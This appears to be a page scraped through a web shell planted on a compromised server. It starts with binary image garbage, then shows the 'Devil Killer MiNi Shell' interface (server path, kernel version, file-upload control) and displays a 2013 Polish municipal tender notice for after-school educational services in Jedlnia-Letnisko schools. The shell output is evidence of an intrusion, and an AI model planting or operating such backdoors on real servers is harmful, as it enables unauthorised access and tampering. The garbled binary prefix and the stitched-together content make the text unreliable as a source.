JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131021/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131021/426934-N-2013.html

<p class="kh_header"><b>Jedlnia-Letnisko: ŚWIADCZENIE USŁUG EDUKACYJNYCH - II</b><br>
<b>Numer ogłoszenia: 426934 - 2013; data zamieszczenia: 21.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Jedlnia Letnisko , ul. Radomska 43, 26-630 Jedlnia-Letnisko, woj. mazowieckie, tel. 048 3848470, faks 048 3848470 w. 222.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jedlnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG EDUKACYJNYCH - II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne obejmujące przeprowadzenie zajęć w roku szkolnym 2013/2014 (od podpisania umowy z wykonawcą do 30 06.2014r.)
Prowadzenie zajęć pozalekcyjnych jest ukierunkowane na indywidualizację pracy z uczniami klas I-III, rozwój uzdolnień i pomoc uczniom o specjalnych potrzebach edukacyjnych i wychowawczych. Zajęcia mają na celu wyrównanie szans edukacyjnych oraz zmniejszenie różnic w jakości usług edukacyjnych.
Usługa podzielona jest na pięć części zamówienia. 
I Część zamówienia:
przeprowadzenie zajęć w ramach projektu pt. Klucz do sukcesu - dla uczniów klas I-III Publicznej Szkoły Podstawowej mieszczącej się przy Zespole Szkół Ogólnokształcących w Natolinie; współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych; Program Operacyjny Kapitał Ludzki 
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych- 30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
 Zajęcia rozwijające zainteresowania  dla dzieci szczególnie uzdolnionych z języka angielskiego 30h w ciągu roku szkol. 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia rozwijające zainteresowania uczniów wybitnie  uzdolnionych - ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Łączna ilość godzin do zrealizowania 120 w I części zamówienia
II Część zamówienia:
przeprowadzenie zajęć w ramach projektu pt. Klucz do sukcesu - dla uczniów klas I-III Publicznej Szkoły Podstawowej mieszczącej się przy Zespole Szkół Ogólnokształcących w Jedlni-Letnisko; współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych; Program Operacyjny Kapitał Ludzki 
Zajęcia logopedyczne dla dzieci z zaburzeniami  rozwoju mowy-60h w ciągu roku szkolnego 2013/14, 2 grupy. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 60 godzin - 15 godzin w 2013 r. i 45 godzin w 2014 r
Gimnastyka korekcyjna dla dzieci z wadami postawy-30h w ciągu roku szkolnego 2013/14, 1 grupa Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych  z języka angielskiego-60h w ciągu roku szkolnego 2013/14, 2 grupy. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 60 godzin - 15 godzin w 2013 r. i 45 godzin w 2014 r
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - artystycznie orgiami -60h ciągu roku szkolnego 2013/14, 2 grupy. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 60 godzin - 15 godzin w 2013 r. i 45 godzin w 2014 r
Łączna ilość godzin do zrealizowania 240 w II części zamówienia
III Część zamówienia:
przeprowadzenie zajęć w ramach projektu pt. Klucz do sukcesu - dla uczniów klas I-III Publicznej Szkoły Podstawowej mieszczącej się przy Zespole Szkół Ogólnokształcących w Myśliszewicach; współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych; Program Operacyjny Kapitał Ludzki
Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia dla dzieci uzdolnionych artystycznie teatr-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych- 30h  w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia logopedyczne dla dzieci z zaburzeniami  rozwoju mowy-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Łączna ilość godzin do zrealizowania 120 w III części zamówienia
IV Część zamówienia:
przeprowadzenie zajęć w ramach projektu pt. Klucz do sukcesu - dla uczniów klas I-III Publicznej Szkoły Podstawowej w Słupicy; współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych; Program Operacyjny Kapitał Ludzki
Zajęcia logopedyczne dla dzieci z zaburzeniami  rozwoju mowy-40h  w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 5 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 40 godzin - 10 godzin w 2013 r. i 30 godzin w 2014 r
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej-40h  w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 5 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 40 godzin - 10 godzin w 2013 r. i 30 godzin w 2014 r
Zajęcia rozwijające zainteresowania uczniów wybitnie  uzdolnionych - ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych-40h  w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 5 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 40 godzin - 10 godzin w 2013 r. i 30 godzin w 2014 r
Łączna ilość godzin do zrealizowania 120 w IV części zamówienia
V Część zamówienia:
przeprowadzenie zajęć w ramach projektu pt. Klucz do sukcesu - dla uczniów klas I-III Publicznej Szkoły Podstawowej w Gzowicach; współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych; Program Operacyjny Kapitał Ludzki
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji- 30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej-30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - artystycznie teatr -30h w ciągu roku szkolnego 2013/14, 1 grupa. Zajęcia po 4 godz. dydaktyczne miesięcznie dla każdej z grup. Liczba godzin prowadzonych zajęć: łącznie 30 godzin - 10 godzin w 2013 r. i 20 godzin w 2014 r
Łączna ilość godzin do zrealizowania 120 w V części zamówienia.
Do obowiązków prowadzącego będzie należało m.in.:
1. Prowadzenie zajęć pozalekcyjnych (zajęcia przed rozpoczęciem lub po zakończeniu obowiązkowych lekcji w godzinach dostosowanych do wymogów uczestników i warunków szkoły) w terminie od dnia zawarcia umowy do dnia wskazanego w danej części zamówienia. Mając na względzie dobro uczniów, będących uczestnikami powyższych projektów należy uwzględnić możliwość przesunięcia zajęć w miejsce nieplanowanego -okienka- między zajęciami uczniów w przypadku nieplanowanej nieobecności nauczyciela na planowanych (wynikających z planu nauczania) zajęciach. 
2. Opracowanie w terminie 7 dni kalendarzowych od dnia zawarcia umowy, programu i harmonogramu, a następnie przedstawienia do akceptacji Dyrektorowi Szkoły i koordynatorowi projektu. Program zajęć (dot. danej części przedmiotu zamówienia) powinien zawierać: - cel ogólny i cele szczegółowe zajęć, - formy realizacji, - sposoby realizacji celów, - oczekiwane efekty, - sposób ewaluacji efektów, - tematy kolejnych zajęć, - wykorzystanie pomocy dydaktycznych zakupionych w ramach projektu. Wzór harmonogramu będzie opracowany przez koordynatora projektu. b) Obowiązkiem Wykonawcy jest prowadzenie zajęć zgodnie z Rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego - Dz. U. z 2002 Nr 46, poz. 432 ze zm.). Uwagi dodatkowe: program dostosowany jest do potrzeb i poziomu  uczniów (zgodnie z przeprowadzoną diagnozą) nie przewyższający ich możliwości, uwzględniający aktualną wiedzę, czas zajęć musi być maksymalnie wykorzystany. 
3. Dokumentowanie na bieżąco zajęć pozalekcyjnych (karty czasu pracy, dzienniki zajęć, imienne listy obecności uczestników zajęć). 
4. Sporządzanie dwóch opinii o uczniach na podstawie analiz, diagnoz i innych narzędzi wykorzystywanych do pomiaru jakości i mierzenia rezultatów w celu oceny skuteczności prowadzonych (na początku i na końcu projektu)  
5. Przeprowadzenie testów sprawdzających poziom wiedzy uczestników/czek po zrealizowaniu 60% h zajęć.
6. Zastosowanie zasady równości płci w zależności od zdiagnozowanych potrzeb w odniesieniu do problematyki projektu i jego uczestników.
7. Informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu. 
8. Terminowe wypełnianie wszystkich wymaganych dokumentów projektu. 
9. Przestrzeganie obowiązków, zaleceń i terminów wynikających z realizacji umowy. 
10. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczniów w czasie trwania zajęć, jakość i terminowość prowadzonych zajęć oraz szkody wyrządzone przez swoje działania lub zaniechania podczas wykonywania przedmiotu umowy. 
11. Dbałość o stan nieodpłatnie udostępnionych przez Dyrektora Szkoły pracowni/sali, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu. 
12. Współdziałanie z Dyrektorem Szkoły, w której odbywają się zajęcia w zakresie spraw mających wpływ na rytm pracy szkoły w związku z prowadzonymi zajęciami. Wykonawca będzie zobowiązany bezwzględnie dostosować się do ustalonego przez dyrektora szkoły planu zajęć. Dotyczy to również organizacji spotkań w ramach zajęć, a także organizowanych imprez. 
13. Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. nr 101 poz. 926 ze zm.) oraz Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. z 2004 r. Nr 100, poz. 1024). 
14. Wspomaganie promocji i ewaluacji Projektów - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego. 
15. Przestrzeganie wytycznych dotyczących oznaczenia Projektu w ramach POKL. 
16. Realizacja indywidualnych programów zajęć ukierunkowanych na realizację celów Projektu. 
Wynagrodzenie będzie wynagrodzeniem współfinansowanym ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego. Zamawiający informuje, iż wynagrodzenie będzie wypłacane za rzeczywiste godziny pracy osób prowadzących zajęcia w trakcie roku szkolnego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 80.41.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Zamawiający  spełnienie warunku oceni na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Zamawiający  spełnienie warunku oceni na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Zamawiający  spełnienie warunku oceni na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  spełnienie warunku oceni na podstawie dokumentów potwierdzających, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tzn. - co najmniej 1 osobą w danej szkole do danego rodzaju zajęć, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;
W wykazie oprócz oznaczenia osób zdolnych do wykonania zamówienia należy jednoznacznie wskazać informację na temat ich rzeczywistych kwalifikacji zawodowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Zamawiający  spełnienie warunku oceni na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jedlnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jedlnia Letnisko, ul. Radomska 43; 26-630 Jedlnia Letnisko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2013 godzina 10:00, miejsce: Urząd Gminy Jedlnia Letnisko, ul. Radomska 43; 26-630 Jedlnia Letnisko - Biuro Obsługi Mieszkańca.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizowane w ramach Projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX: Rozwój wykształcenia i kompetencji w regionach,
Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, Program Operacyjny Kapitał Ludzki, projektu p.n.
- Klucz do sukcesu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi edukacyjne dla uczniów ZSO w Natolinie.</p>
